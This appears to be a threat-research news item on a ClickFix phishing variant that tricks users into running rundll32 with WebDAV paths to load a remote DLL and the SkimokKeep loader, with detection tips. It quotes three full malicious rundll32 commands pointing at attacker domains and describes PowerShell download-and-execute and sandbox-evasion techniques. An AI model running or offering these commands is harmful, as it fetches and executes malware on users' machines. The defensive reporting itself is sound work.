ClickFix Evades PowerShell Detection via Rundll32 and WebDAV
A new ClickFix attack variant has been identified that evades detection by shifting execution away from PowerShell and mshta towards native Windows tools like rundll32.exe and WebDAV mini-redirector.
This evolution allows attackers to bypass traditional script-based detection, increasing the stealthy success rate of compromises.
The attack begins with phishing, directing users to a fake CAPTCHA page like healthybyhillary[.]com. The CyberProof Threat Research Team observed this new variant, where attackers manipulate users via the Win + R shortcut to execute malicious commands on their own device.

This trick convinces users to paste and run commands like:
- rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
- rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
- rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
These commands leverage the WebDAV mini-redirector (syntax \server@port) to access remote HTTP-hosted DLLs as local network shares.

Rundll32 executes the exported function #1 from the downloaded “verification.google” DLL in memory, hindering analysis.
Multi-Stage Infection Chain
Post-execution, rundll32 retrieves the malicious DLL and PowerShell executes additional payloads (e.g., Invoke-Expression, Net.WebClient.DownloadString) using flags like -NoP and -NonI. This initiates the SkimokKeep loader, a memory-resident payload.

SkimokKeep evades detection through:
- Dynamic API resolution via DJB2 hashing.
- In-memory execution, avoiding disk writes.
- Process injection and memory modification.
- Anti-VM/Sandbox checks (screen resolution, desktop presence, user interaction, system time, locale/versions).
- Anti-debugging (GetTickCount timing checks, PID/THPID logic manipulation).
Detection Opportunities
Detection is possible via:
- rundll32.exe execution with WebDAV syntax (@80) or davclnt.dll.
- Outbound HTTP connections from rundll32.exe.
- Suspicious rundll32 CLI patterns.
- Follow-up PowerShell/mshta activity.
- Connections to suspicious domains.
Network hunting queries for abnormal rundll32 WebDAV paths (e.g., KQL examples) are effective.

This variant underscores attackers’ shift to fileless, user-driven “LOLbin” (living off the land binaries) attacks, bypassing script-based defenses.
Strengthening visibility into LOLbin abuse, command-line execution, and network behavior is critical to detecting evolving threats.